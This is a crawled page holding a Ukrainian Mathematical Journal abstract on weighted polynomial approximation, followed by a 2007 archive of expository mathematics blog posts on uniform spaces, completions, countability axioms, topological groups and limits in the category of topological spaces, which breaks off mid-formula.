{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8926321268081665, "perplexity": 182.37055536056693}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-51/segments/1544376828018.77/warc/CC-MAIN-20181216234902-20181217020902-00515.warc.gz"}
http://umj.imath.kiev.ua/article/?lang=en&article=8419
2019 Том 71 № 7 # On the Best Approximation in the Mean by Algebraic Polynomials with Weight and the Exact Values of Widths for the Classes of Functions Abstract The exact value of the extremal characteristic is obtained on the class L 2 r (D ρ ), where r ∈+; ${D}_{\rho} = \sigma (x)\frac{d^2}{d{ x}^2}+\tau (x)\frac{d}{d x}$ , σ and τ are polynomials of at most the second and first degrees, respectively, ρ is a weight function, 0 < p ≤ 2, 0 < h < 1, λ n (ρ) are eigenvalues of the operator D ρ , φ is a nonnegative measurable and summable function (in the interval (a, b)) which is not equivalent to zero, Ω k,ρ is the generalized modulus of continuity of the k th order in the space L 2,ρ (a, b), and E n (f)2,ρ is the best polynomial approximation in the mean with weight ρ for a function f ∈ L 2,ρ (a, b). The exact values of widths for the classes of functions specified by the characteristic of smoothness Ω k,ρ and the K-functional $\mathbb{K}$ m are also obtained. English version (Springer): Ukrainian Mathematical Journal 65 (2013), no. 12, pp 1774-1792. Citation Example: Shvachko A. V., Vakarchuk S. B. On the Best Approximation in the Mean by Algebraic Polynomials with Weight and the Exact Values of Widths for the Classes of Functions // Ukr. Mat. Zh. - 2013. - 65, № 12. - pp. 1604–1621. Full text
2019-08-18 18:05:09
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8339232206344604, "perplexity": 919.0603474488863}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-35/segments/1566027313987.32/warc/CC-MAIN-20190818165510-20190818191510-00305.warc.gz"}
https://unapologetic.wordpress.com/2007/11/
The Unapologetic Mathematician Complete Uniform Spaces Okay, in a uniform space we have these things called “Cauchy nets”, which are ones where the points of the net are getting closer and closer to each other. If our space is sequential — usually a result of assuming it to be first- or second-countable — then we can forget the more complicated nets and just consider Cauchy sequences. In fact, let’s talk as if we’re looking at a sequence to build up an intuition here. Okay, so a sequence is Cauchy if no matter what entourage we pick to give a scale of closeness, there’s some point along our sequence where all of the remaining points are at least that close to each other. If we pick a smaller entourage we might have to walk further out the sequence, but eventually every point will be at least that close to all the points beyond it. So clearly they’re all getting pressed together towards a limit, right? Unfortunately, no. And we have an example at hand of where it can go horribly, horribly wrong. The rational numbers $\mathbb{Q}$ are an ordered topological group, and so they have a uniform structure. We can give a base for this topology consisting of all the rays $(a,\infty)=\{x\in\mathbb{Q}|a, the rays $(-\infty,a)=\{x\in\mathbb{Q}|x, and the intervals $(a,b)=\{x\in\mathbb{Q}|a, which is clearly countable and thus makes $\mathbb{Q}$ second-countable, and thus sequential. Okay, I’ll take part of that back. This is only “clear” if you know a few things about cardinalities which I’d thought I’d mentioned but it turns out I haven’t. It was also pointed out that I never said how to generate an equivalence relation from a simpler relation in a comment earlier. I’ll wrap up those loose ends shortly, probably tomorrow. Back to the business at hand: we can now just consider Cauchy sequences, instead of more general Cauchy nets. Also we can explicitly give entourages that comprise a base for the uniform structure, which is all we really need to check the Cauchy condition: $E_a=\{(x,y)\in\mathbb{Q}\times\mathbb{Q}|\left|x-y\right|. I did do absolute values, didn’t I? So a sequence $x_i$ is Cauchy if for every rational number $a$ there is an index $N$ so that for all $i\geq N$ and $j\geq N$ we have $\left|x_i-x_j\right|. We also have a neighborhood base $\mathcal{B}(q)$ for each rational number $q$ given by the basic entourages. For each rational number $r$ we have the neighborhood $\{x\in\mathbb{Q}|\left|x-q\right|. These are all we need to check convergence. That is, a sequence $x_i$ of rational numbers converges to $q$ if for all rational $r$ there is an index $N$ so that for all $i\geq N$ we have $\left|x_i-q\right|. And finally: for each natural number $n\in\mathbb{N}$ there are only finitely many square numbers less than $2n^2$. We’ll let $a_n^2$ be the largest such number, and consider the rational number $x_n=\frac{a_n}{n}$. We can show that this sequence is Cauchy, but it cannot converge to any rational number. In fact, if we had such a thing this sequence would be trying to converge to the square root of two. The uniform space $\mathbb{Q}$ is shot through with holes like this, making tons of examples of Cauchy sequences which “should” converge, but don’t. And this is all just in one little uniform space! Clearly Cauchy nets don’t converge in general. But we dearly want them to. If we have a uniform space in which every Cauchy sequence does converge, we call it “complete”. Categorically, a complete uniform space is sort of alike an abelian group. The additional assumption is an extra property which we may forget when convenient. That is, we have a category $\mathbf{Unif}$ of uniform spaces and a full subcategory $\mathbf{CUnif}$ of complete uniform spaces. The inclusion functor of the subcategory is our forgetful functor, and we’d like an adjoint to this functor which assigns to each uniform space $X$ its “completion” $\overline{X}$. This will contain $X$ as a dense subspace — the closure $\mathrm{Cl}(X)$ in $\overline{X}$ is the whole of $\overline{X}$ — and will satisfy the universal property that if $Y$ is any other complete uniform space and $f:X\rightarrow Y$ is a uniformly continuous map, then there is a unique uniformly continuous $\bar{f}:\overline{X}\rightarrow Y$ extending $f$. To construct such a completion, we’ll throw in the additional assumption that $X$ is second-countable so that we only have to consider Cauchy sequences. This isn’t strictly necessary, but it’s convenient and gets the major ideas across. I’ll leave you to extend the construction to more general uniform spaces if you’re interested. What we want to do is identify Cauchy sequences in $X$ — those which should converge to something in the completion — with their limit points in the completion. But more than one sequence might be trying to converge to the same point, so we can’t just take all Cauchy sequences as points. So how do we pick out which Cauchy sequences should correspond to the same point? We’ll get at this by defining what the uniform structure (and thus the topology) should be, and then see which points have the same neighborhoods. Given an entourage $E$ of $X$ we can define an entourage $\overline{E}$ as the set of those pairs of sequences $(x_i,y_j)$ where there exists some $N$ so that for all $i\geq N$ and $j\geq N$ we have $(x_i,y_j)\in E$. That is, the sequences which get eventually $E$-close to each other are considered $\overline{E}$-close. Now two sequences will be equivalent if they are $\overline{E}$-close for all entourages $E$ of $X$. We can identify these sequences and define the points of $\overline{X}$ to be these equivalence classes of Cauchy sequences. The entourages $\overline{E}$ descend to define entourages on $\overline{X}$, thus defining it as a uniform space. It contains $X$ as a uniform subspace if we identify $x\in X$ with (the equivalence class of) the constant sequence $x, x, x, ...$. It’s straightforward to show that this inclusion map is uniformly continuous. We can also verify that the second-countability of $X$ lifts up to $\overline{X}$. Now it also turns out that $\overline{X}$ is complete. Let’s consider a sequence of Cauchy sequences $(x_k)_i$. This will be Cauchy if for all entourages $\overline{E}$ there is an $\bar{N}$ so that if $i\geq\bar{N}$ and $j\geq\bar{N}$ the pair $((x_k)_i,(x_k)_j)$ is in $\overline{E}$. That is, there is an $N_{i,j}$ so that for $k\geq N_{i,j}$ and $l\geq N_{i,j}$ we have $((x_k)_i,(x_l)_j)\in E$. We can’t take the limits in $X$ of the individual Cauchy sequences $(x_k)_i$ — the limits along $k$ — but we can take the limits along $i$! This will give us another Cauchy sequence, which will then give a limit point in $\overline{X}$. As for the universal property, consider a uniformly continuous map $f:X\rightarrow Y$ to a complete uniform space $Y$. Then every point $\bar{x}$ in $\overline{X}$ comes from a Cauchy sequence $x_i$ in $X$. Being uniformly continuous, $f$ will send this to a Cauchy sequence $f(x_i)$ in $Y$, which must then converge to some limit $\bar{f}(\bar{x})\in Y$ since $Y$ is complete. On the other hand, if $x_i'$ is another representative of $\bar{x}$ then the uniform continuity of $f$ will force $\lim f(x_i)=\lim f(x_i')$, so $\bar{f}$ is well-defined. It is unique because there can be only one continuous function on $\overline{X}$ which agrees with $f$ on the dense subspace $X$. So what happens when we apply this construction to the rational numbers $\mathbb{Q}$ in an attempt to patch up all those holes and make all the Cauchy sequences converge? At long last we have the real numbers $\mathbb{R}$! Or, at least, we have the underlying complete uniform space. What we don’t have is any of the field properties we’ll want for the real numbers, but we’re getting close to what every freshman in calculus thinks they understand. November 29, 2007 Countability Axioms Now I want to toss out a few assumptions that, if they happen to hold for a topological space, will often simplify our work. There are a lot of these, and the ones that I’ll mention I’ll dole out in small, related collections. Often we will impose one of these assumptions and then just work in the subcategory of $\mathbf{Top}$ of spaces satisfying them, so I’ll also say a few things about how these subcategories behave. Often this restriction to “nice” spaces will end up breaking some “nice” properties about $\mathbf{Top}$, and Grothendieck tells us that it’s often better to have a nice category with some bad objects than to have a bad category with only nice objects. Still, the restrictions can come in handy. First I have to toss out the concept of a neighborhood base, which is for a neighborhood filter like a base for a topology. That is, a collection $\mathcal{B}(x)\subseteq\mathcal{N}(x)$ of neighborhoods of a point $x$ is a base for the neighborhood filter $\mathcal{N}(x)$ if for every neighborhood $N\in\mathcal{N}(x)$ there is some neighborhood $B\in\mathcal{B}(x)$ with $B\subseteq N$. Just like we saw for a base of a topology, we only need to check the definition of continuity at a point $x$ on a neighborhood base at $x$. Now we’ll say that a topological space is “first-countable” if each neighborhood filter has a countable base. That is, the sets in $\mathcal{B}(x)$ can be put into one-to-one correspondence with some subset of the natural numbers $\mathbb{N}$. We can take this collection of sets in the order given by the natural numbers: $B_i$. Then we can define $U_0=B_0$, $U_1=U_0\cap B_1$, and in general $U_n=U_{n-1}\cap B_n$. This collection $U_i$ will also be a countable base for the neighborhood filter, and it satisfies the extra property that $m\geq n$ implies that $U_m\subseteq U_n$. From this point we will assume that our countable base is ordered like this. Why does it simplify our lives to only have a countable neighborhood base at each point? One great fact is that a function $f:X\rightarrow Y$ from a first-countable space $X$ will be continuous at $x$ if each neighborhood $V\in\mathcal{N}_Y(f(x))$ contains the image of some neighborhood $U\in\mathcal{N}_X(x)$. But $U$ must contain a set from our countable base, so we can just ask if there is an $i\in\mathbb{N}$ with $f(B_i)\in V$. We also picked the $B_i$ to nest inside of each other. Why? Well we know that if $f$ isn’t continuous at $x$ then we can construct a net $x_\alpha\in X$ that converges to $x$ but whose image doesn’t converge to $f(x)$. But if we examine our proof of this fact, we can look only at the base $B_i$ and construct a sequence that converges to $x$ and whose image fails to converge to $f(x)$. That is, a function from a first-countable space is continuous if and only if $\lim f(x_i)=f(\lim x_i)$ for all sequences $x_i\in X$, and sequences are a lot more intuitive than general nets. When this happens we say that a space is “sequential”, and so we have shown that every first-countable space is sequential. Every subspace of a first-countable space is first-countable, as is every countable product. Thus the subcategory of $\mathbf{Top}$ consisting of first-countable spaces has all countable limits, or is “countably complete”. Disjoint unions of first-countable spaces are also first-countable, so we still have coproducts, but quotients of first-countable spaces may only be sequential. On the other hand, there are sequential spaces which are not first-countable whose subspaces are not even sequential, so we can’t just pass to the subcategory of sequential spaces to recover colimits. A stronger condition than first-countability is second-countability. This says that not only does every neighborhood filter have a countable base, but that there is a countable base for the topology as a whole. Clearly given any point $x$ we can take the sets in our base which contain $x$ and thus get a countable neighborhood base at that point, so any second-countable space is also first-countable, and thus sequential. Another nice thing about second-countable spaces is that they are “separable”. That is, in a second-countable space $X$ there will be a countable subset $S\subseteq X$ whose closure $\mathrm{Cl}(S)$ is all of $X$. That is, given any point $x\in X$ there is a sequence $x_i\in S$ — we don’t need nets because $X$ is sequential — so that $x_i$ converges to $x$. That is, in some sense we can “approximate” points of $X$ by sequences of points in $S$, and $S$ itself has only countably many points. The subcategory of all second-countable spaces is again countably complete, since subspaces and countable products of second-countable spaces are again second-countable. Again, we have coproducts, but not coequalizers since a quotient of a second-countable space may not be second-countable. However, if the map $X\rightarrow X/\sim$ sends open sets in $X$ to open sets in the quotient, then the quotient space is second-countable, so that’s not quite as bad as first-countability. Second-countability (and sometimes first-countability) is a property that makes a number of constructions work out a lot more easily, and which doesn’t really break too much. It’s a very common assumption since pretty much every space an algebraic topologist or a differential geometer will think of is second-countable. However, as is usually the case with such things, “most” spaces are not second-countable. Still, it’s a common enough assumption that we will usually take it as read, making explicit those times when we don’t assume that a space is second-countable. November 28, 2007 Topological Groups Now we’ve said a lot about the category $\mathbf{Top}$ of topological spaces and continuous maps between them. In particular we’ve seen that it’s complete and cocomplete — it has all limits and colimits. But we’ve still yet to see any good examples of topological spaces. That will change soon. First, though, I want to point out something we can do with these limits: we can define topological groups. Specifically, a topological group is a group object in the category of topological spaces. That is, it’s a topological space $G$ along with continuous functions $m:G\times G\rightarrow G$, $e:\{*\}\rightarrow G$, and $i:G\rightarrow G$ that satisfy the usual commutative diagrams. A morphism of topological groups is then just like a homomorphism of groups, but by a continuous function between the underlying topological spaces. Alternately we can think of it as a group to which we’ve added a topology so that the group operations are continuous. But as we’ve seen, a topological structure feels a bit floppier than a group structure, so it’s not really as easy to think of a “topology object” in a category. So we’ll start with $\mathbf{Top}$ and take group objects in there. Now it turns out that every topological group is a uniform space in at least two ways. We can declare the set $E_U=\{(x,y)|xy^{-1}\in U\}$ to be an entourage for any neighborhood $U$ of the identity, along with any subset of $G\times G$ containing such an $E_U$. Since any neighborhood of $e$ contains $e$ itself, each $E_U$ must contain the diagonal $\{(x,x)\}$. The intersection $E_U\cap E_V$ is the entourage $E_{U\cap V}$, and so this collection is closed under intersections. To see that $\bar{E}_U$ is an entourage, we must consider the inversion map. Any neighborhood $N$ of the identity contains an open set $U$. Then the preimage $i^{-1}(U)$ is just the “reflection” that sends each element of $U$ to its inverse, which must thus be open. The reflection of $N$ contains the reflection of $U$, and is thus a neighborhood of the identity. Then $\bar{E}_U=\{(x,y)|yx^{-1}=(xy^{-1})^{-1}\in U\}$ is the same as $E_{i^{-1}(U)}$. Now, why must there be a “half-size” entourage? We’ll need to construct a half-size neighborhood of the identity. That is, a neighborhood $V$ so that the product of any two elements of $V$ lands in the neighborhood $U$. Then $(x,y)$ and $(y,z)$ in $E_V$ means that $xy^{-1}$ and $yz^{-1}$ are in $V$, and thus their product $xz^{-1}$ is in $U$, so $(x,z)\in E_U$. To construct this neighborhood $V$ let’s start by assuming $U$ is an open neighborhood by passing to an open subset of our neighborhood if necessary. Then its preimage $m^{-1}(U)$ is open in $G\times G$ by the continuity of $m$, and $U\times G$ and $G\times U$ will be open by the way we built the product topology. The intersection of these will be the collection of pairs $(x,y)\in G\times G$ with both $x$ and $y$ in $U$, and whose product also lands in $U$, and will be open as a finite intersection of open sets. We can project this set of pairs onto its first or second factor, and take the intersection of these two projections to get the open set $V$ which is our half-size neighborhood. The uniform structure we have constructed is called the right uniformity on $G$ because if we take any element $a\in G$ the function from $G$ to itself define by right multiplication by $a$$x\mapsto m(x,a)$ — is uniformly continuous. Indeed, right multiplication sends an entourage $E_U=\{(x,y)|xy^{-1}\in U\}$ to itself, since the pair $(xa,ya)$ satisfies $xa(ya)^{-1}=xaa^{-1}y^{-1}=xy^{-1}\in U$. Left multiplication, on the other hand, sends a pair $(x,y)$ in $E_U$ to $(ax,ay)$, for which we have $ax(ay)^{-1}=axy^{-1}a^{-1}\in aUa^{-1}$. Thus to an entourage $E_U$ we can pick the entourage $E_{a^{-1}Ua}$. So left multiplication is also uniformly continuous, but not quite as easily. We could go through the same procedure to define the left uniformity which again swaps the roles of left and right multiplication. Note that the left and right uniformities need not be the same collection of entourages, but they define the same topology. Still, this doesn’t tell us how to get our hands on any topological groups to begin with, so here’s a way to do just that: start with an ordered group. That is, a set with the structures of both a group and a partial order so that if $a\leq b$ then $ga\leq gb$ and $ag\leq bg$. Using this translation invariance we can determine the order just by knowing which elements lie above the identity, for then $a\leq b$ if and only if $e\leq a^{-1}b$. The elements $x$ with $1\leq x$ form what we call the positive cone $G^+$. We can now use this to define a topology by declaring the positive cone to be closed. Then we’d like our translations to be homeomorphisms, so for each $a$ the set of $x$ with $a\leq x$ must also be closed. Similarly we want inversion to be a homeomorphism, and since it reverses the order we find that for each $a$ the set of $x$ with $x\leq a$ is closed. And then we can use the complements of all these as a subbase to generate a topology. This topology will in fact be uniform by everything we’ve done above. And, finally, one specific example. The field $\mathbb{Q}$ of rational numbers is an ordered group if we forget the multiplication. And thus we get a uniform topology on it, generated by the subbase of half-infinite sets. Specifically, for each rational number $a$ the set $(a,\infty)$ of all $x\in\mathbb{Q}$ with $a and the set $(-\infty,a)$ of all $x\in\mathbb{Q}$ with $x are declared open, and they generate the topology. A neighborhood of $0\in\mathbb{Q}$ will be any subset which contains one of the form $(-a,a)$. Since the group is abelian, both the left and the right uniformities coincide. For each rational number $a$ we have an entourage $E_a=\{(x,y)|-a. That is, a pair of rational numbers are in $E_a$ if they differ by less than $a$. November 27, 2007 Posted by | Group theory, Topology | 2 Comments Limits of Topological Spaces We’ve defined topological spaces and continuous maps between them. Together these give us a category $\mathbf{Top}$. We’d like to understand a few of our favorite categorical constructions as they work in this context. First off, the empty set $\varnothing$ has a unique topology, since it only has the one subset at all. Given any other space $X$ (we’ll omit explicit mention of its topology) there is a unique function $\varnothing\rightarrow X$, and it is continuous since the preimage of any subset of $X$ is empty. Thus $\varnothing$ is the initial object in $\mathbf{Top}$. On the other side, any singleton set $\{*\}$ also has a unique topology, since the only subsets are the whole set and the empty set, which must both be open. Given any other space $X$ there is a unique function $X\rightarrow\{*\}$, and it is continuous because the preimage of the empty set is empty and the preimage of the single point is the whole of $X$, both of which are open in $X$. Thus $\{*\}$ is a terminal object in $\mathbf{Top}$. Now for products. Given a family $X_\alpha$ of topological spaces indexed by $\alpha\in A$, we can form the product set $\prod\limits_{\alpha\in A}X_\alpha$, which comes with projection functions $\pi_\beta:\prod\limits_{\alpha\in A}X_\alpha\rightarrow X_\beta$ and satisfies a universal property. We want to use this same set and these same functions to describe the product in $\mathbf{Top}$, so we must choose our topology on the product set so that these projections will be continuous. Given an open set $U\subseteq X_\beta$, then, its preimage $\pi_\beta^{-1}(U)$ must be open in $\prod\limits_{\alpha\in A}X_\alpha$. Let’s take these preimages to be a subbase and consider the topology they generate. If $X$ is any other space with a family of continuous maps $f_\alpha:X\rightarrow X_\alpha$, then the universal property in $\mathbf{Set}$ gives us a unique function $f:X\rightarrow\prod\limits_{\alpha\in A}X_\alpha$. But will it be a continuous map? To check this, remember that we only need to verify it on a subbase for the topology on the product space, and we have one ready to work with. Each set in the subbase is the preimage $\pi_\beta^{-1}(U)$ of an open set in some $X_\beta$, and then its preimage under $f$ is $f^{-1}(\pi_\beta^{-1}(U))=(\pi_\beta\circ f)^{-1}(U)=f_\beta^{-1}(U)$, which is open by the assumption that each $f_\beta$ is continuous. And so the product set equipped with the product topology described above is the categorical product of the topological spaces $X_\alpha$. What about coproducts? Let’s again start with the coproduct in $\mathbf{Set}$, which is the disjoint union $\biguplus\limits_{\alpha\in A}X_\alpha$, and which comes with canonical injections $\iota_\beta:X_\beta\rightarrow\biguplus\limits_{\alpha\in A}X_\alpha$. This time let’s jump right into the universal property, which says that given another space $X$ and functions $f_\alpha:X_\alpha\rightarrow X$, we have a unique function $f:\biguplus\limits_{\alpha\in A}X_\alpha\rightarrow X$. Now we need any function we get like this to be continuous. The preimage of an open set $U\subseteq X$ will be the union of the preimages of each of the $f_\alpha$, sitting inside the disjoint union. By choosing $X$, the $f_\alpha$, and $U$ judiciously, we can get the preimage $f_\alpha^{-1}(U)$ to be any open set we want in $X_\alpha$, so the open sets in the disjoint union should consist precisely of those subsets $V$ whose preimage $\iota_\alpha^{-1}(V)\subseteq X_\alpha$ is open for each $\alpha\in A$. It’s easy to verify that this collection is actually a topology, which then gives us the categorical coproduct in $\mathbf{Top}$. If we start with a topological space $X$ and take any subset $S\subseteq X$ then we can ask for the coarsest topology on $S$ that makes the inclusion map $i:S\rightarrow X$ continuous, sort of like how we defined the product topology above. The open sets in $S$ will be any set of the form $S\cap U$ for an open subset $U\subseteq X$. Then given another space $Y$, a function $f:Y\rightarrow S$ will be continuous if and only if $i\circ f:Y\rightarrow X$ is continuous. Indeed, the preimage $(i\circ f)^{-1}(U)=f^{-1}(S\cap U)$ clearly shows this equivalence. We call this the subspace topology on $S$. In particular, if we have two continuous maps $f:X\rightarrow Y$ and $g:X\rightarrow Y$, then we can consider the subspace $E\subseteq X$ consisting of those points $x\in X$ satisfying $f(x)=g(x)$. Given any other space $Z$ and a continuous map $h:Z\rightarrow X$ such that $f\circ h=g\circ h$, clearly $h$ sends all of $Z$ into the set $E$; the function $h$ factors as $e\circ h'$, where $e:E\rightarrow X$ is the inclusion map. Then $h'$ must be continuous because $h$ is, and so the subspace $E$ is the equalizer of the maps $f$ and $g$. Dually, given a topological space $X$ and an equivalence relation $\sim$ on the underlying set of $X$ we can define the quotient space $X/\sim$ to be the set of equivalence classes of points of $X$. This comes with a canonical function $p:X\rightarrow X/\sim$, which we want to be continuous. Further, we know that if $g:X\rightarrow Y$ is any function for which $x_1\sim x_2$ implies $g(x_1)=g(x_2)$, then $g$ factors as $g=g'\circ p$ for some function $g':X/\sim\rightarrow Y$. We want to define the topology on the quotient set so that $g$ is continuous if and only if $g'$ is. Given an open set $U\in Y$, its preimage $g'^{-1}(U)$ is the set of equivalence classes that get sent into $U$, while its preimage $g^{-1}(U)$ is the set of all points that get sent to $U$. And so we say a subset $V$ of the quotient space $X/\sim$ is open if and only if its preimage — the union of the equivalence classes in $V$ is open in $X$. In particular, if we have two maps $f:Y\rightarrow X$ and $g:Y\rightarrow X$ we get an equivalence relation on $X$ by defining $x_1\sim x_2$ if there is a $y\in Y$ so that $f(y)=x_1$ and $g(y)=x_2$. If we walk through the above description of the quotient space we find that this construction gives us the coequalizer of $f$ and $g$. And now, the existence theorem for limits tells us that all limits and colimits exist in $\mathbf{Top}$. That is, the category of topological spaces is both complete and cocomplete. As a particularly useful example, let’s look at an example of a pushout. If we have two topological spaces $U$ and $V$ and a third space $A$ with maps $A\rightarrow U$ and $A\rightarrow V$ making $A$ into a subspace of both $U$ and $V$, then we can construct the pushout of $U$ and $V$ over $A$. The general rule is to first construct the coproduct of $U$ and $V$, and then pass to an appropriate coequalizer. That is, we take the disjoint union $U\uplus V$ and then identify the points in the copy of $A$ sitting inside $U$ with those in the copy of $A$ sitting inside $V$. That is, we get the union of $U$ and $V$, “glued” along $A$. November 26, 2007 Posted by | Category theory, Topology | 25 Comments Uniform Spaces Now let’s add a little more structure to our topological spaces. We can use a topology on a set to talk about which points are “close” to a subset. Now we want to make a finer comparison by being able to say “the point $a$ is closer to the subset $A$ than $y$ is to $B$.” We’ll do this with a technique similar to neighborhoods. But there we just defined a collection of neighborhoods for each point. Here we will define the neighborhoods of all of our points “uniformly” over the whole space. To this end, we will equip our set $X$ with a family $\Upsilon$ of subsets of $X\times X$ called the “uniform structure” on our space, and the elements $E\in\Upsilon$ will be “entourages”. We will write $E[x]$ for the set of $y$ so that $(x,y)\in E$, and we want these sets to form a neighborhood filter for $x$ as $E$ varies over $\Upsilon$. Here we go: • Every entourage $E$ contains the diagonal $\{(x,x)|x\in X\}$. • If $E$ is an entourage and $E\subseteq F\subseteq X\times X$, then $F$ is an entourage. • If $E$ and $F$ are entourages, then $E\cap F$ is an entourage. • If $E$ is an entourage then there is another entourage $F$ so that $(x,y)\in F$ and $(y,z)\in F$ imply $(x,z)\in E$. • If $E$ is an entourage then its reflection $\bar{E}=\{(y,x)|(x,y)\in E\}$ is also an entourage. The first of these axioms says that $x\in E[x]$, as we’d hope for a neighborhood. The next two ensure that the collection of all the $E[x]$ forms a neighborhood filter for $x$, but it does so “uniformly” for all the $x\in X$ at once. This means that we can compare neighborhoods of two different points because each of them comes from an entourage, and we can compare the entourages. The fourth axiom is like the one I omitted from my discussion of neighborhoods; every collection of entourages gives rise to a topology, but topologies can only give back uniform structures satisfying this requirement. Finally, the last axiom gives the very reasonable condition that if $y\in E[x]$, then $x\in \bar{E}[y]$. That is, if one point is in a neighborhood of another, then the other point should be in a neighborhood of the first. Sometimes this requirement is omitted to get a “quasi-uniform space”. Now that we can compare closeness at different points, we can significantly enrich our concept of nets. Before now we talked about a net $x_\alpha$ converging to a point $x$ in the sense that the points $x_\alpha$ eventually got close to $x$. But now we can talk about whether the points of the net are getting closer to each other. That is, for every entourage $E$ there is a $\gamma\in D$ so that for all $\alpha\geq\gamma$ and $\beta\geq\gamma$ the pair $(x_\alpha,x_\beta)$ is in $E$. In this case we say that the net is “Cauchy”. Now, if the full generality of nets still unnerves you, you can restrict to sequences. Then the condition is that there is some number $N$ so that for any two numbers $m$ and $n$ bigger than $N$ we have $x_m\in E[x_n]$. This gives us the notion of a Cauchy sequence, which some of you may already have heard of. We can also enrich our notion of continuity. Before we said that a function $f:X\rightarrow Y$ from a topological space defined by a neighborhood system $(X,\mathcal{N}_X)$ to another one $(Y,\mathcal{N}_Y)$ is continuous at a point $x\in X$ if for each neighborhood $V\in\mathcal{N}_Y(f(x))$ contained the image $f(U)$ of some neighborhood $U\in\mathcal{N}_X(x)$, and we said that $f$ was continuous if it was continuous at every point of $X$. Now our uniform structures allow us to talk about neighborhoods of all points of a space together, so we can adapt our definition to work uniformly. We say that a function $f:X\rightarrow Y$ from a uniform space $(X,\Upsilon_X)$ to another one $(Y,\Upsilon_Y)$ is uniformly continuous if for each entourage $F\in\Upsilon_Y$ there is some entourage $E\in\Upsilon_X$ that gets sent into $F$. More precisely, for every pair $(x_1,x_2)\in E$ the pair $(f(x_1),f(x_2))$ is in $F$. In particular, any neighborhood of a point $f(x)\in Y$ is of the form $F[f(x)]$ for some entourage $F\in\Upsilon_Y$. Then uniform continuity gives us an entourage $E\in\Upsilon_X$, and thus a neighborhood $E[x]$ which is sent into $F[f(x)]$. Thus uniform continuity implies continuity, but not necessarily the other way around. It is possible that a function is continuous, but that the only ways of picking neighborhoods to satisfy the definition do not come from entourages. These two extended definitions play well with each other too. Let’s consider a uniformly continuous function $f:X\rightarrow Y$ and a Cauchy net $x_\alpha$ in $X$. Then I assert that the image $f(x_\alpha)$ of this net is again Cauchy. Indeed, for every entourage $F\in\Upsilon_Y$ we want a $\gamma$ so that $\alpha\geq\gamma$ and $\beta\geq\gamma$ imply that the pair $(f(x_\alpha),f(x_\beta))$ is in $F$. But uniform continuity gives us an entourage $E\in\Upsilon_X$ that gets sent into $F$, and the Cauchy property of our net gives us a $\gamma$ so that $(x_\alpha,x_\beta)\in E$ for all $\alpha$ and $\beta$ above $\gamma$. Then $(f(x_\alpha),f(x_\beta))\in F$ and we’re done. It wouldn’t surprise me if one could turn this around like we did for neighborhoods. Given a map $f:X\rightarrow Y$ which is not uniformly continuous use the uniform structure $\Upsilon_X$ as a directed set and construct a net on it which is Cauchy in $X$, but whose image is not Cauchy in $Y$. Then one could define uniform continuity as preservation of Cauchy nets and derive the other definition from it. However I’ve been looking at this conjecture for about an hour now and don’t quite see how to prove it. So for now I’ll just leave it, but if anyone else knows the right construction offhand I’d be glad to hear it. November 23, 2007 Bases and Subbases We’ve defined topologies by convergence of nets, by neighborhood systems, and by closure operators. In each case, we saw some additional hypothesis — sometimes more and sometimes less explicitly — to restrict which data actually corresponded to a topological space. That is, many neighborhood systems give rise to the same topology, which in turn induces only one of those neighborhood systems. Now let’s turn back to our original definition of topology and see how we can weaken it in a similar way. Remember that we defined the closure of a set $A$ in a topological space $(X,\tau)$ as the smallest closed set containing $A$. To get at it, we took the intersection of all the closed sets containing $A$. And we knew that at least one such closed set existed because the whole space $X$ was closed. We’re going to do the exact same thing to come up with topologies. So let’s take a collection $\sigma\subseteq P(X)$ of subsets of $X$. We want the smallest collection $\tau\subseteq\sigma$ of subsets of $X$ that contains $\sigma$ so that $\tau$ is a topology. To get at it, we consider all the topologies on $X$ that contain $\sigma$, and then take their intersection. As we saw back when we first defined topologies, this intersection will again be a topology, and it will be contained in any topology containing $\sigma$. And we know that we have at least one topology containing $\sigma$ because the discrete topology has all of $P(X)$ as its open sets. Let’s see how we can build up the topology $\tau$ from $\sigma$ more directly. What is it that prevents $\sigma$ from being a topology itself? Well, it might not be closed under taking arbitrary unions and finite intersections. So let’s start with $\sigma$ and throw in all the unions of finite intersections of elements of $\sigma$. We’ll use the convention that the union of no subsets of $X$ is the empty set $\varnothing$, while the intersection of no subsets of $X$ is the entire set $X$. This means we at least have $\varnothing$ and $X$ as unions of finite intersections. Now let’s consider the intersection of two such sets. That is, if we start with $\bigcup\limits_{a\in\mathcal{A}}\bigcap\limits_{i\in\mathcal{I}_a}U_{a,i}$ and $\bigcup\limits_{b\in\mathcal{B}}\bigcap\limits_{i\in\mathcal{I}_b}U_{b,i}$, then we get the intersection $\left(\bigcup\limits_{a\in A}\bigcap\limits_{i\in\mathcal{I}_a}U_{a,i}\right)\cap\left(\bigcup\limits_{b\in 